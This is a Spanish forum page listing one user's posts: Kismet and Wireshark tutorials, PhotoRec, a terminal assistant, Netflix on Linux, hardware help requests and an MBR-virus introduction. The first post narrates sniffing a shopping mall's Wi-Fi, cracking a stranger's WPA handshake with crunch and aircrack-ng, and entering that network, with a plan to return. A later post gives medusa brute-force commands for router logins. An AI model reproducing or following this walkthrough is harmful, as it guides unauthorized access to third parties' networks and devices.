Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - CloudswX

#1
Saludos.

Esta es la segunda parte del manual, en la primera parte aprendimos a instalar kismet y configurarlo para ponerlo a olfatear el aire en busca de algunos bits, mostramos como guardar los logs de captura del mismo, pero de que nos sirven los logs si no podemos sacarle provecho. Pues en esta parte tratare de explicar como podríamos sacarle provecho.

Capturas de kismet.

En cada ejecución/captura de kismet este nos genera 5 tipos de archivos:

1. Un fichero tipo "alert"
2. Un fichero tipo "nettxt"
3. Un fichero tipo "netxml"
4. Un fichero tipo "pcapdump"
5. Un fichero tipo "gpsxml"



Pero que son estos ficheros y que información contienen? Pues a continuación explico en que consiste cada archivo:

a.- Fichero alert

Como dijimos anteriormente kismet también puede funcionar como un detector de intrusos, ataques, comportamientos anormales, etc.. Y en cada captura nos genera un alert de todo lo que considera extraño. Por ejemplo este alert lo saque mientras corría kismet en un centro comercial (wifi abierta e insegura, perfecto escenario para correr un snifer)

Sat Aug 23 23:15:28 2014

ADHOCCONFLICT 0 20:AA:4B:4F:76:A1
                2C:A8:35:C4:86:22
                20:AA:4B:4F:76:A1
                00:00:00:00:00:00

Network BSSID 20:AA:4B:4F:76:A1 advertised as AP network,
now advertising as Ad-Hoc IBSS, which may indicate AP spoofing/impersonation


Como podemos ver dice claramente que la dirección MAC 20:AA:4B:4F:76:A1 fue identificada como un AP (Acces Point) y que luego se identifico como una red Ad-Hoc lo que pudiera significar un ataque de AP Spoofing (Suplantación de punto de acceso).

b.- Fichero nettxt

Aquí tenemos un log con mucha información sobre las redes escaneadas, aquí una pequeña parte del log. (Las direccionas MAC fueron omitidas, asi como los uuid, y los nombres de las mismas)

Kismet (http://www.kismetwireless.net)
Sat Aug 23 23:10:01 2014 - Kismet 2013.03.R0
-----------------

Network 1: BSSID --:--:--:--:--:--
Manuf      : BelkinIn
First      : Sat Aug 23 23:10:19 2014
Last       : Sat Aug 23 23:13:11 2014
Type       : infrastructure
BSSID      : --:--:--:--:--:--
   SSID 1
    Type       : Beacon
    SSID       : "sorry_guys"
    First      : Sat Aug 23 23:10:19 2014
    Last       : Sat Aug 23 23:13:11 2014
    Max Rate   : 54.0
    Beacon     : 10
    Packets    : 5
    Encryption : WPA+PSK
    Encryption : WPA+AES-CCM
Channel    : 2
Frequency  : 31 - 5 packets, 100.00%
Max Seen   : 1000
LLC        : 5
Data       : 0
Crypt      : 0
Fragments  : 0
Retries    : 0
Total      : 5
Datasize   : 0
Last BSSTS : 94674329974
    Seen By : Broadcom (wlan0) 235642e2-2b3c-11e4-8437-f003ba15e201 5 packets
              Sat Aug 23 23:13:11 2014
Client 1: MAC --:--:--:--:--:--
  Manuf      : BelkinIn
  First      : Sat Aug 23 23:10:19 2014
  Last       : Sat Aug 23 23:13:11 2014
  Type       : From Distribution
  MAC        : --:--:--:--:--:--
  Channel    : 2
  Frequency  : 31 - 5 packets, 100.00%
  Max Seen   : 1000
  LLC        : 5
  Data       : 0
  Crypt      : 0
  Fragments  : 0
  Retries    : 0
  Total      : 5
  Datasize   : 0
     Seen By : Broadcom (wlan0) 235642e2-2b3c-11e4-8437-f003ba15e201 5 packets
               Sat Aug 23 23:13:11 2014


Seguimos...    ;D

c.- Fichero netxml

Contiene la misma información que el fichero nettxt, solo que en formato xml

d.- Fichero gpsxml

Pues kismet es una herramienta muy utilizada para hacer wardriving y si contamos con un gps podemos utilizarlo modificando el archivo de configuración kismet.conf en la linea que dice:


# Do we have a GPS?
gps=false


Como yo no tengo GPS (por ahora) lo tengo desactivado y mi fichero gpsxml solo tiene esto:

Código (xml) [Seleccionar]
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE gps-run SYSTEM "http://kismetwireless.net/kismet-gps-2.9.1.dtd">

<gps-run gps-version="5" start-time="Sun Aug 24 16:49:24 2014">

    <network-file>/home/cl0udswx/Software/Kismet/Kismet-20140824-16-49-25-1.netxml</network-file>

</gps-run>


Seguimos rumbo al ultimo pero no menos importante.

e.- Fichero pcapdump.

Este es el mas jugoso de todos, ya que contiene el volcado de todo lo que kismet pudo olfatear. Este fichero de captura puede ser abierto por cualquier analizador de trafico como TCPDump, Wireshark, Cain&Abel, etc.. En mi caso ya tenia preinstalado Wireshark asi que es el que tomare para las ilustraciones.



En la parte superior podemos todos y cada uno de los paquetes capturados, pudiendo asi filtrarlos por protocolo, tamaño, etc...



Mientras que en la parte inferior tenemos el paquete a nivel hexadecimal para perdernos buscando algun texto sin cifrar, también nos brinda información como el tipo de encapsulado, hora de envió, origen, destino, etc... Y mucha, mucha, mucha información.


Imaginando aircrack.


Ya estas alturas me sentia un amargo en la boca de tanta agua, asi que pedi un cafe sentado en mi mesa del food_area del centro comercial, la verdad no tenia ganas de seguir escribiendo, pero en el primer cafe me llego a la mente y si uso aircrack-ng con este archivo de captura? en teoria los archivos de captura que genera aircrack son los mismo que consegui con kismet, asi que tire mano de la terminal y escribi:

sudo aircrack-ng Kismet-20140823-23-10-01-1.pcapdump

Consiguiendo lo siguiente:



:o    :o    :o     :o

Al parecer kismet logro sacar un HandShake de una de las redes snifadas, asi que sin mucha esperanza decidí generarle un diccionario numérico de 8 a 9 caracteres con crunch

sudo crunch 8 9 1345789 -o vamos.txt

Luego pasarselo a aircrack-ng

sudo aircrack-ng -w vamos.txt Kismet-20140823-23-10-01-1.pcapdump

Ya solo era cuestión de tiempo y de suerte...



Y al final cuando ya me estaba desesperando recordé la virtud mas importante de todas, la paciencia.

Y entonces sucedió!!!



Como no se me ocurrió probar claves nulas como esta, "999999999"   ???  en serio?

Me encontraba dentro de una red "protegida" mil ideas de cosas para hacer pero el cansancio pudo mas que yo, otro dia que me siente en el mismo sitio vere que consigo y lo posteo aquí mismo.

Asi que sin darme cuenta había usado kismet + aircrack + wireshark para capturar un handshake y su posterior crack.

Esto es todo por ahora hermanos, saludos a todos los underc0ders y ojala les sirva.
#2
Saludos.

Por escaso de tiempo llevo varios días realizando este pequeño tutorial (todos los días un poquito) y a pesar de que en la red existen manuales muy detallados esta vez quise hacer algo al alcance de todos los mortales que en algún momento nos complicamos con tanta definición.


1.1-¿Que es kismet?

Pues como todo buen manual debemos empezar por definir que es kismet y para que funciona.

Kismet es una aplicación creada para sistemas basados en Unix (Linux, OS X, FreeBSD, NetBSD, OpenBSD) aunque también es posible utilizarla en windows por medio de Cygwin. Esta herramienta funciona como:

a.- Un escáner de redes wireless.

Muchos aquí pensaran: "Pero para que necesito un escáner de redes inhalambricas si mi tarjeta de red detecta todas las redes que hay cerca?" y la respuesta es NO, NO ES LO MISMO. Con kismet seremos capaces de ver redes inhalambricas sin importar si esta sea oculta, mostrándonos el nombre y los dispositivos asociados, así como sus direcciones MAC. También veremos la actividad de las mismas en un hermoso juego de colores (algo así como un semáforo).

b.- Un sniffer perro sabueso.

Un muy buen sniffer, y lo mejor de todo es su silencio. Y cuando digo silencio me refiero a que no podremos ser detectados por otro cazador que quizás también este buscándonos, me explico: Para poder olfatear el aire en busca de bits de información necesitamos tener una tarjeta wireless en "modo monitor" y dependiendo de la forma en que se active alguien puede darse cuenta de que hay una nariz esperando. Los que han usado NetSlumbler saben a que me refiero. Kismet guarda un logs automáticamente de todo lo que ha capturado, por default lo tira todo en nuestra carpeta HOME pero mas adelante les explico como cambiarlo.

Instalando kismet

Pues antes de tirarlo a correr debemos instalarlo, para instalarlo hacemos lo siguiente:

Si tienes windows aquí dejo una guia muy buena de como instalarlo.

http://www.renderlab.net/projects/wrt54g/kismetonwindows.html

Si tienes Linux debe bastar con hacer un:
sudo apt-get install kismet



Luego de instalarlo lo mas probable es que querramos echarlo a correr  ejecutando y lo mas probable es que NO FUNCIONE ya que primero debemos ajustar unas cuantas cositas en el archivo kismet.conf ubicado en /etc/kismet. Basta con ejecutar:

sudo pluma /etc/kismet/kismet.conf



En mi caso esta es la ruta donde esta el archivo kismet.conf, si has compilado kismet entonces la ruta es usr/local/etc/. Otra cosa donde dice "pluma" deben sustituirlo por el editor predeterminado que tengan en sus sistemas.

Si todo ha ido bien deberiamos tener el fichero listo para ser editado.

Configurando kismet.


En el fichero kismet.conf nos damos cuenta de que todas las lineas tiene un # delante, lo que significa que el interprete las pasara por alto, pero en este caso es una forma de mantener las opciones desactivas para que el usuario las active simplemente borrando el #. Los parámetros estan muy bien comentado por lo que no es nada del otro mundo, como usaremos kismet en nuestro equipo solo con el fin de monitorizar y snifar un poco es suficiente con configurar lo siguiente:

a.- Modificar el source.

No es mas que la fuente de donde kismet sacara toda la data. Para ello buscamos la linea que comienza con "source=" y la modificamos en el siguiente orden:

# See the README for full information on the new source format
# ncsource=interface:options
# for example:
# ncsource=wlan0
# ncsource=wifi0:type=madwifi
ncsource=wlan0:name=Broadcom,hop=true


Este es mi caso particular, puede que tu interfaz tenga otro nombre y otro fabricante.

b.- Modificar el directorio donde se guardaran las capturas. Buscamos la linea que inicia con "Prefix" y editamos.
# Prefix of where we log (as used in the logtemplate later)
logprefix=/home/cl0udswx/Software/Kismet


Pueden asignarle la ruta que mejor consideren.

Y listo ya podemos correr "kismet" en nuestra terminal, despues de unos cuantos avisos debera saltar la interfaz con algo como esto:


Luego de aceptar..



Cerramos la consola del logs



y....



Voila!!!!

Para mas detalle pueden leer el README desde la pagina oficial de kismet.

http://www.kismetwireless.net/documentation.shtml

Saludos a todos.


#3
Saludos gente buena del foro.

Pues resulta y viene a ser el caso que en algún momento necesitamos recuperar algo que por error humanos o por fallos de software ha sido borrado de nuestra unidad de almacenamiento (discos duros,CD regrabables y pendrives) y para estos fines en la red existe un amplio catalogo de herramientas que cumplen su cometido, pero en esta ocasión trataremos la aplicación PhotoRec.

Que es PhotoRec?

PhotoRec es un software diseñado para recuperar archivos perdidos incluyendo vídeos, documentos y archivos de los discos duros y CDRoms así como imágenes perdidas (por eso el nombre PhotoRecovery) de las memorias de las cámaras fotográficas, MP3 players, PenDrives, etc. PhotoRec ignora el sistema de archivos y hace una búsqueda profunda de los datos, funcionando incluso si su sistema de archivos está muy dañado o ha sido re-formateado.

PhotoRec esta disponible en las siguientes plataformas:

DOS/Win9x
Windows NT 4/2000/XP/2003/Vista/7/8
Linux
FreeBSD, NetBSD, OpenBSD
Sun Solaris
Mac OS X

PhotoRec es una aplicación gratuita y Open Source multi-plataforma distribuida bajo Licencia Pública General GNU.

Instalación y uso.

Pues como siempre lo primero es instalarlo  :rolleyes:    :rolleyes:     :rolleyes:

Si usas windows.

1.- Ve al Website de la aplicacion y seleccionas la opcion correcta.
2.-Descargas
3.-Descomprimes con WinRar
4.-Ve a la carpeta resultante y ejecuta PhotoRec.exe

Si usas Linux.


Escribe lo siguiente en una terminal:

sudo apt-get install testdisk




Para ejecutarlo simplemente escribimos lo siguiente en la terminal.

sudo photorec



Lo cual nos mostrara una pequeña interfaz muy sencilla e intuitiva de utilizar, igual a esta:



En esta parte podemos seleccionar la unidad de almacenamiento (discos duros, pendrives, discos regrabables) de donde queremos recuperar los archivos, el movimiento por la pantalla se hace en base a las flechas de nuestro teclado. En la imagen tengo una memoria LG de 8GB conectada al equipo, así que es la que usare en los ejemplos.

Una ves seleccionado el dispositivo le presionamos ENTER y nos mostrara lo siguiente:



Aquí nos pide elegir la partición especifica desde donde queremos recuperar los archivos, en la parte inferior tenemos 4 opciones, que son: Search, Options, File Options y Quit .

Quit.

En serio creen que les explicare lo que pasa si eligen esta?   :rolleyes: :rolleyes:

File Options
Aquí podremos hacer un filtrado de los tipos de archivos que realmente buscamos, marcando y desmarcando con la barra espaciadora.



Al finalizar fijamos los parámetros usando la tecla "B"

Options
Aqui tenemos unas cuantas opciones para mejorar los resultados y el rendimiento.


Search

Despues de los ajustes correspondientes y finalmente le damos a Search, lo cual nos llevara a esto:



Aquí solo nos queda especificar si queremos que busca en toda la particion o simplemente en los espacios vacíos del disco, la cual en mi opinión es la mejor idea si queremos archivos completos y funcionales ya que al buscar en los espacios sobrescritos es mas probable conseguir archivos corruptos e inutilizables.

Por ultimo especificamos el directorio final donde queremos los archivos recuperados, confirmando con la tecla "C"



Eso es todo, personalmente siempre que me toca recuperar algún archivo no me lo pienso dos veces para usar esta increíble herramienta.

Saludos hermanos.




#4
Saludos a todos,

Si alguna vez has pensado en tener un trió amoroso al mas puro estilo binario aquí esta la oportunidad de lograrlo, solamente tu, la terminal y BETTY.

-BETTY?
-Pero quien carajo es BETTY?

:huh:

Pues podríamos decir que Betty es un asistente para la terminal de linux que por medio de ordenes y frases sencillas nos permite interactuar de forma "mas humana" con nuestra distro. Logrando así una forma divertida y sencilla de hacer algunas cosas.

Funciones de Betty (por ahora):

- Informar quien esta logueado en un sistema.
- Puede informarnos las condiciones meteorológicas de cualquier ciudad en particular.
- Control de reproducción musical para spotfy.
- Preguntarle la hora y la fecha actual
- Bajar ficheros del Internet.
- Traducción de ingles a español.
- Modifica los permisos de un fichero ó de un directorio.
- Extraer archivos.
- Buscar mapas de cualquier parte del mundo (sustentándose en Google Maps)
- Buscar archivos.
- Busqueda en la web.

Entre otras muy divertidas que debemos encontrar por nosotros mismos.

Como instalarla?

1-. Pues para que todo nos quede a la perfección tenemos que tener resueltas algunas dependencias necesarias, las cuales usaremos esto:

sudo apt-get install ruby curl git

Lo cual se vería como esto:



2-. El siguiente paso es descargarnos la ultima versión desde github:


git clone https://github.com/pickhardt/betty




3-. Por ultimo procedemos a crear el alias en nuestro fichero /.bashrc con el siguiente comando:

echo "alias betty=\"~/betty/main.rb\"" >> ~/.bashrc
source ~/.bashrc




Realizado todo esto solo queda comenzar a hablar con nuestra nueva amiga.



A continuación una lista con unos cuantos comandos para ir socializando con betty.

Count
betty how many words are in this directory
betty how many characters are in myfile.py
betty count lines in this folder
(Note that there's many ways to say more or less the same thing.)

Config
betty change your name to Joe
betty speak to me
betty stop speaking to me

Datetime
betty what time is it
betty what is todays date
betty what month is it
betty whats today

Find
betty find me all files that contain california

Internet
betty download http://www.mysite.com/something.tar.gz to something.tar.gz
betty uncompress something.tar.gz
betty unarchive something.tar.gz to somedir
(You can use unzip, unarchive, untar, uncompress, and expand interchangeably.)
betty compress /path/to/dir

iTunes
betty mute itunes
betty unmute itunes
betty pause the music
betty resume itunes
betty stop my music
betty next song
betty prev track
betty what song is playing
(Note that the words song, track, music, etc. are interchangeable)

Fun
betty go crazy
betty whats the meaning of life
...and more that are left for you to discover!

Map
betty show me a map of mountain view

Meta
betty what version are you (or just betty version)
betty whats your github again

Permissions
betty give me permission to this directory
betty give anotheruser ownership of myfile.txt

Process
betty show me all processes by root containing grep
betty show me all my processes containing netbio

Sizes
betty show size for myfile.txt

Spotify
betty play spotify
betty pause spotify
betty next spotify
betty previous spotify

User
betty whats my username
betty whats my real name
betty whats my ip address
betty who else is logged in
betty whats my version of ruby

Web queries
betty turn web on
betty please tell me what is the weather like in London



Desde mi punto de vista este proyecto promete mucho, podríamos estar mirando algo parecido a "Jarvis".

Saludos.

Fuente https://github.com/pickhardt/betty





#5
Saludos inmensos a todos los que formamos parte de esta maravillosa comunidad de elhacker.net.

 En el camino de la informática y la seguridad sucede que tarde o temprano tendremos que acceder a la configuración de algún router por medio de la interfaz web del mismo al que ya estemos previamente conectados, pero en algunos casos sucederá que no tenemos la combinación correcta entre "usuario" y "contraseña" así que solo nos queda recurrir a la fuerza bruta, a estas alturas todos  ó casi todos sabemos de una u otra forma lo que es la fuerza bruta  y como funciona, pero para los mas que no lo sepan les dire que según wikipedia:

"En criptografía, se denomina ataque de fuerza bruta a la forma de recuperar una clave probando todas las combinaciones posibles hasta encontrar aquella que permite el acceso."

Pues dicho esto viene a la mente:

Cuales herramientas tengo a mi alcance para auditar la seguridad de un router?

Pues existen un catalogo amplio y extenso de donde escoger como por ejemplo L0phtCrack, Brutus,  THC-Hydra,Patator, Cain/Abel, Medusa, etc... Siendo Hydra uno de los mas famosos y utilizados debido a su gran cantidad de documentación disponible, en este caso quisiera hacerlo usando medusa la cual a pesar de tener soporte para menos protocolos que Hydra me gusta mucho por la sencillez de su gramática así como su estabilidad.



Aclarados los conceptos básicos continuamos, así que manos a la obra!!

Escenario.

**Equipo corriendo Linux Mint XFCE
**Router con dirección IP privada 192.168.1.1
**Conectado via Ethernet.

Desde el ordenador intentaremos entrar a la configuración del router escribiendo la dirección IP (192.168.1.1)  en el navegador, con lo cual nos debe saltar un formulario de login parecido a este:



Si sabes de antemano cual es la combinación correcta de "usuario" y "contraseña" entonces no tiene ningún sentido que estes leyendo esto, asi que gracias por tu tiempo y adiós.  :silbar: En cambio si no tienes ni la mas remota idea de cual puede ser esa combinación entonces continuemos y agarra tu terminal.

Lo primero que debemos hacer obviamente es instalarlo, lo cual es tan sencillo como escribir en una terminal:

cloudswx@cloudswx-lab ~ $ sudo apt-get install medusa


Después de instalarlo seria muy interesante saber cuales protocolos tienen soporte, lo cual se consigue escribiendo "medusa -d"



Como podemos ver en la imagen medusa tiene soporte para HTTP.

+ http.mod : Brute force module for HTTP : version 2.0


Llegados a este punto les diré que existen 3 posibles circunstancias para forzar el acceso de un router y cualquier otro formulario login, así que para cada caso expondré una solución distinta.

1.- Si conocemos el usuario pero nos falta la contraseña.

En este caso tendremos la mitad del problema resuelto y la otra mitad la resolveremos usando medusa en combinación con un diccionario. (La fuerza bruta se hace a base diccionarios que contengan las posibles combinaciones), medusa puede ser alimentado de diccionarios tanto para forzar el usuario como la contraseña. Así que para este caso en particular la sintaxis del ataque sera la siguiente:

cloudswx@cloudswx-lab ~ $ medusa -h 192.168.1.1 -u admin -P dic-0294.txt -M http


-h Con esta opción especificamos el host que deseamos auditar
-u Esta opción especifica que ya sabemos el nombre de usuario. (para este caso admin)
-P con esta opción le decimos a medusa que debe encontrar el password en un diccionario, en este caso "dic-0294.txt" (especificando la ruta completa).
-M Esta opcion indica sobre cual protocolo queremos auditar.

Con lo cual si el password se encuentra conseguiremos..



2.- Si conocemos el password pero no tenemos el usuario entonces tenemos que modificar la sintaxis del ataque de la siguiente forma:

cloudswx@cloudswx-lab ~ $ medusa -h 192.168.1.1 -U dic-0294.txt -p 1234 -M http


-h El host que deseamos auditar
-U Con esto le decimos que debe buscar el usuario desde un diccionario (-u minuscula indica el usuario a usar, -U en mayuscula indica que debe buscar en un diccionario)
-p Le dice a medusa que no debe buscar el password y se le especifica posteriormente (-p en minuscula indica el password a utilizar, -P en mayuscula indica que debe buscar el correcto en un diccionario).
-M Esta opcion indica sobre cual protocolo queremos auditar.

3.- Si no conocemos ninguno de los valores entonces medusa debe hacer todo el trabajo por nosotros, es decir debe buscar la combinación correcta de "usuario" y "password". La sintaxis es la siguiente:

cloudswx@cloudswx-lab ~ $ medusa -h 192.168.1.1 -U userlist.txt -P passwordlist.txt -M http


Al ser ataque por ferza bruta la tasa de éxito dependerá en gran parte de 2 factores:
a.) La robustez de la combinación entre "usuario" y "password"
b.) La eficacia del diccionario que estemos utilizando.

En un siguiente articulo les mostrare como generar diccionarios a nuestra medida  para ser utilizados en este tipo de auditorias ya que por ejemplo algunas personas usan palabras que muy difícilmente estarán en un diccionario de esos que nos bajamos de la web.


Pagina oficial de medusa
#6
Buenas tardes comunidad,

Sucede que tengo un portátil con las siguientes características:



y recientemente me ha dado un poco por volver a trastear aircrack-ng (para no perder los viejos habitos de caza) asi que me he instalado la suite aircrack-ng desde los mismo repositorios de ubuntu y realizo siguiente:

1.- Hago una enumeracion de las interfaces de red existentes en mni equipo.

cloudswx@cloudswx-tesla ~ $ iwconfig
eth0      no wireless extensions.

eth1      IEEE 802.11abg  ESSID:off/any  
         Mode:Managed  Access Point: Not-Associated  
         Retry  long limit:7   RTS thr:off   Fragment thr:off
         Power Management:off
         
lo        no wireless extensions.


2.- Luego procedo a tratar de poner mi interfaz "eth1" en modo monitor

cloudswx@cloudswx-tesla ~ $ sudo airmon-ng start eth1


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
857 avahi-daemon
861 avahi-daemon
878 NetworkManager
908 wpa_supplicant
2552 dhclient


Interface Chipset Driver

eth1 Unknown wl - [phy0]mon0: ERROR while getting interface flags: No such device      # Esta es la linea del error.

(monitor mode enabled on mon0)


Y es justo aqui donde comienza mi confusión con ERROR while getting interface flags: No such device diciéndome que tengo una supuesta interfaz nueva en "mon0", pero cuando realizo una nueva enumeración de interfaces me arroja nuevamente lo mismo:

cloudswx@cloudswx-tesla ~ $ iwconfig
eth0      no wireless extensions.

eth1      IEEE 802.11abg  ESSID:off/any  
         Mode:Managed  Access Point: Not-Associated  
         Retry  long limit:7   RTS thr:off   Fragment thr:off
         Power Management:off
         
lo        no wireless extensions.


:rolleyes:

Estuve leyendo sobre que es un asunto de los drivers no parcheados sobre los que funciona mi tarjeta de red pero de gual forma necesito un poco de orientación. Mi tarjeta de red es:

cloudswx@cloudswx-tesla ~ $ lspci | grep Network
0c:00.0 Network controller: Broadcom Corporation BCM4312 802.11b/g LP-PHY (rev 01)


Gracias de antemano, saludos!!!
#7


Saludos hermanos, pues resulta ser que recientemente adquiri el servicio de Netflix para disfrutar de su gran catalogo de series y peliculas (especialmente las familiares e infantiles) y resulto ser imposible acceder al mismo desde mi recien instalado Linux Mint 16. Asi que despues de mucho leer y probar he conseguido hacerlo funcionar y quisiera compartir con ustedes la solucion.

Como ya sabran Netflix utiliza el complemento de microsoft SilverLight para reproducir sus videos nativamente desde el navegador que utilicemos, pero el problema es que SilverLight solo esta licensiado para Windows y para iOS asi que los usuarios de GNU/Linux debemos hacernos valer por otros medios y utilizar "Pipelight" el cual es una version libre de SilverLight. A mi me funciono utilizando mozilla firefox por tanto es el unico con el que lo he probado.

Lo primero es cerrar el mozilla para evitar problemas en la instalacion.

Luego de esto vamos a agregar los repositorios necesarios para hacer la instalacion utilizando los siguientes comandos:

sudo apt-add-repository ppa:ehoover/compholio
sudo apt-add-repository ppa:mqchael/pipelight
sudo apt-get update
sudo apt-get install pipelight


Ahora procedemos a habilitarlo:

sudo pipelight-plugin --enable silverlight
sudo pipelight-plugin --enable flash


El ultimo paso es abrir Firefox e instalar la extension "User Agent Overdrive" desde aqui[/url] y seleccionar Firefox 24/Windows

Reiniciamos el navegador y deberia visualizarse correctamente.



Este metodo es valido para Ubuntu y sus derivados.

#8
Joder que he visto este video en YTB y me han faltado tripas pa´reirme.

[youtube=640,360]http://www.youtube.com/watch?v=Lfj5loPrU88[/youtube]

Esta buenisimo.
#9
buenas noches gente del foro.

Sucede que me he comprado una portátil averiada para usar sus piezas como repuestos, pero al verla me ha gustado bastante y quisiera conservarla para mi. El caso es que el sistema operativo que tiene no funciona (win xp) y al intentar formatear para instalar uno nuevo se reinicia en la segunda etapa de la instalación, es decir justo aquí:



En algunos casos se queda congelada y en otros muestras una distorsión de la imagen en la pantalla de instalación, algo como esto:

Inmediatamente mi primera impresión fue dudar de los módulos de memoria y del disco duro, así que los instale en otro portátil y todo funciona normalmente (incluso pude instalar Fedora sin problemas) Después leyendo en la Internet me di cuenta de que win xp no soporta discos sata de forma nativa, asi que active la opción de compatibilidad con drivers sata en el IOS.

Aun así el problema persiste, intente instalar WIN7, Fedora, WINXP, LinuxMint y nada. Imagine que podría ser el lector de DVD y procedí a instalarlos desde Pendrive booteales entonces la novedad fue que en la instalacion de Fedora el sistema se freeza y las letras se ven como distorsionadas.

Como ultimo recurso utilice un CD del Hirens boot y curiosamente utilizando el miniXP del "Hirens" me permite bootear y utilizar el equipo, incluso estoy escribiendo desde el mismo en estos momentos.

Mi pregunta es: "Por que no me deja instalar ningún sistema?,
                         porque se me reinicia?,
                         que puedo hacer?

Alguien me dijo que podrían ser las temperaturas del procesador (falta de pasta térmica, ventilador sucio, etc..) así que mañana procederé a cambiarle la pasta y limpiarle el ventilador. Mientras tanto ayúdenme gente!!!!

El equipo tiene las siguientes especificaciones:

CitarSatellite A305-S6905
Intel® Core™2 Duo Processor T6400
Windows Vista® Home Premium (SP1, 32-bit)
3GB PC6400 DDR2 800MHz SDRAM
320GB HDD (5400rpm, Serial ATA)
DVD-SuperMulti (+/-R double layer) with Labelflash™ drive
Intel® Wi-Fi Link 5100AGN (802.11a/g/n)
No Bluetooth (No Antenna)
86 key US keyboard
CD/DVD Buttons (Play/Pause, Stop, Prev Track, Next Track)
Media button
Mute button
Touch pad pointing device
Li-Ion (6000mAh)
1-eSATA/USB (2.0) combo port with Sleep and Charge
3-USB (2.0) with Sleep and Charge

Saludos por alla hermanos
#10
Buenas noches, aqui disparo mi duda.

Tengo un Smartphone  HTC Mytouch 4G con conexion Wi-Fi 802.11 b/g/n. Pues el punto es que para utilizar el WiFi de mi casa en el smartphone debo estar a una distancia ridicula del modem (sentarme justo al lado), es decir la recepcion es bastante debil. Todos estos dias consideraba que era un defecto del aparato, pues para mi sorpresa visite la casa de mi padre y con el modem de mi padre la conexion funciono de una forma normal, es decir podia caminar por todo el apartamento sin perder conexion.

Estoy muy confundido pues descarto que sea mi modem, pues en mi casa tengo dos equipos portatiles y mi esposa tiene un Nokia que posee WiFi y todo funciona normalmente. En resumen:

El dispositivo movil HTC no funciona apropiadamente con el modem wireless de mi casa, pero si logra funcionar con un modem distinto.

Saludos por alla y gracias por sus comentarios.
#11
Foro Libre / Guitarra con puente desprendido.
6 Noviembre 2012, 04:46 AM
Buenas.

Al parecer deje las cuerdas de mi guitarra tensadas por un larguisimo tiempo y hoy me he dado cuenta que han desprendido el puente...

Quisiera saber si alguien tiene experiencia retaurando guitarras y puede decirme si es posible repararla por mi mismo.

Es una guitarra clasica acustica.

Saludos por alla.
#12
Buenas noches familia.

Pues sucede que me he comprado una Imac G5 que me ofrecieron de oportunidad, (Un poco vieja y desfasada pero muy barata) Y tiene instalado Leopard 10.5.8 como todas las Imac de ese año. Pues he estado leyendo y me he dado cuenta de que debido al procesador que tiene y su respectivo chipset, Leopard es lo mas reciente de MAC OSX que se le puede instalar, ya que los OSX posteriores no están construidos para esa arquitectura, asi que quisiera instalarle el mismo leopard pero quisiera hacer desde cero, una instalación fresca y nueva.

Tengo una idea difusa de como hacerlo, pero quisiera orientarme un poco sobre el proceso de instalación y que mejor sitio que este templo del saber.

Se le deben instalar drivers?
Que tal la validación, se usa un product key o algo parecido?
El sistema podrá recibir actualizaciones del fabricante?

Gracias de antemano por sus comentarios y consejos.

Saludos familia.
#13
Seguridad / Como eliminar virus en el MBR
30 Octubre 2012, 19:54 PM
Como les había mencionado anteriormente lo prometido es deuda  :-\ y aqui les dejo un pequeño paper sobre que es el MBR (Master_Boot_Record)  y su vulnerabilidad ante algunos virus muy avanzados y potencialmente dañinos. Realizo este paper ya que en los últimos días tuve la oportunidad de trabajar con un PC  que tenia el MBR infectado y en el fanpage de FB del foro muchos algunos usuarios se mostraron interesados en leer un poquito mas sobre el tema. Mas que un manual de como hacer las cosas es algo asi como un hilo de introducción para que todos pueda in aportando sus experiencias

QUE ES Y COMO FUNCIONA EL MBR?

Primero empecemos por definir MBR (Master_Boot_Record), que segun madre "wikipedia" es Un registro de arranque principal, conocido también como registro de arranque maestro o por su nombre en inglés master boot record(abreviado MBR) es el primer sector ("sector cero") de un dispositivo de almacenamiento de datos, como por ejemplo un disco duro.

En palabras mas llanas es una porción del disco duro reservada y exclusiva donde se alberga una lista de los sistemas operativos capaces de iniciar el funcionamiento del computador, por ejemplo, cuando instalamos windows y algún sistema linux en el mismo equipo el MBR es el encargado de buscar y reconocer cada archivo boot.ini en los respectivos "SO" y así permitirnos elegir cual queremos usar.

Generalmente el BIOS de un sistema busca un MBR valido en cualquier disco particionado durante la secuencia de arranque, luego de encontrarlo el MBR busca los sistemas operativos disponibles, (así que el master boot record, como otros sectores de arranque, es un blanco para los virus que infectan el sector de arranque). El código del MBR, puede ser modificado por algún malware, para que realice una serie de tareas que son distintas al comportamiento normal del mismo.

VIRUS EN EL MASTER BOOT RECORD.

Todos tenemos mas o menos una idea de lo que es un virus informatico (malware, rootkits, etc..) pero aquí una definición por mi parte, "Un virus es un pequeño puñado de codigo creado con el objetivo de causar daños y alteraciones en los sistemas infectados, así como su propagación por cualquier medio" justo igual que la gripe. Pues como todo en la vida es un constante equilibrio existen las herramientas anti-malware, por ejemplos anti-virus, anti-rootkits, etc... Estas herramientas normalmente examinan el disco duro y los archivos en busca de código malicioso escondido. Pero generalmente JAMAS BUSCAN EN EL MBR que siendo una porción del disco duro que se ejecuta puede albergar código malicioso. Cabe aclarar que un formateo NO ELIMINA un virus alojado en el MBR

Por ejemplo el "Trojan:DOS/Alureon.A " es uno de esos virus que se enfocan en el MBR causando pantallazos azules y sintomas que a cualquier tecnico experimentado le harian pensar en segmentos de memoria dañados, disco duro defectuoso, etc... Al activarse desde el MBR (Master Boot Record), el virus se asegura la infección del equipo antes del arranque del sistema operativo, pudiendo ejecutarse desde cualquier dispositivo de almacenamiento (USB, CD, DVD, etc.). Esto significa que no se verán rastros en los sistemas operativos (procesos en memoria por ejemplo) ya que los virus no realizan modificaciones directas sobre este y puede pasar inadvertidos tranquilamente, ya que generalmente poseen la capacidad de correr a bajo nivel (a nivel del kernel).

SINTOMAS DE UN VIRUS EN EL MBR

Los sintomas dependen del objetivo que el creador haya tenido en la cabeza, por ejemplo con el que me tope recientemente abria conexiones de red para comunicarse con DNS Dinamico (El clasico troyano) pero pueden aparecer muchos que te revienten el monitor de pantallazos azules o simplemente impidan el inicio correcto del sistema operativo.

COMO ELIMINAR UN VIRUS EN EL MBR.

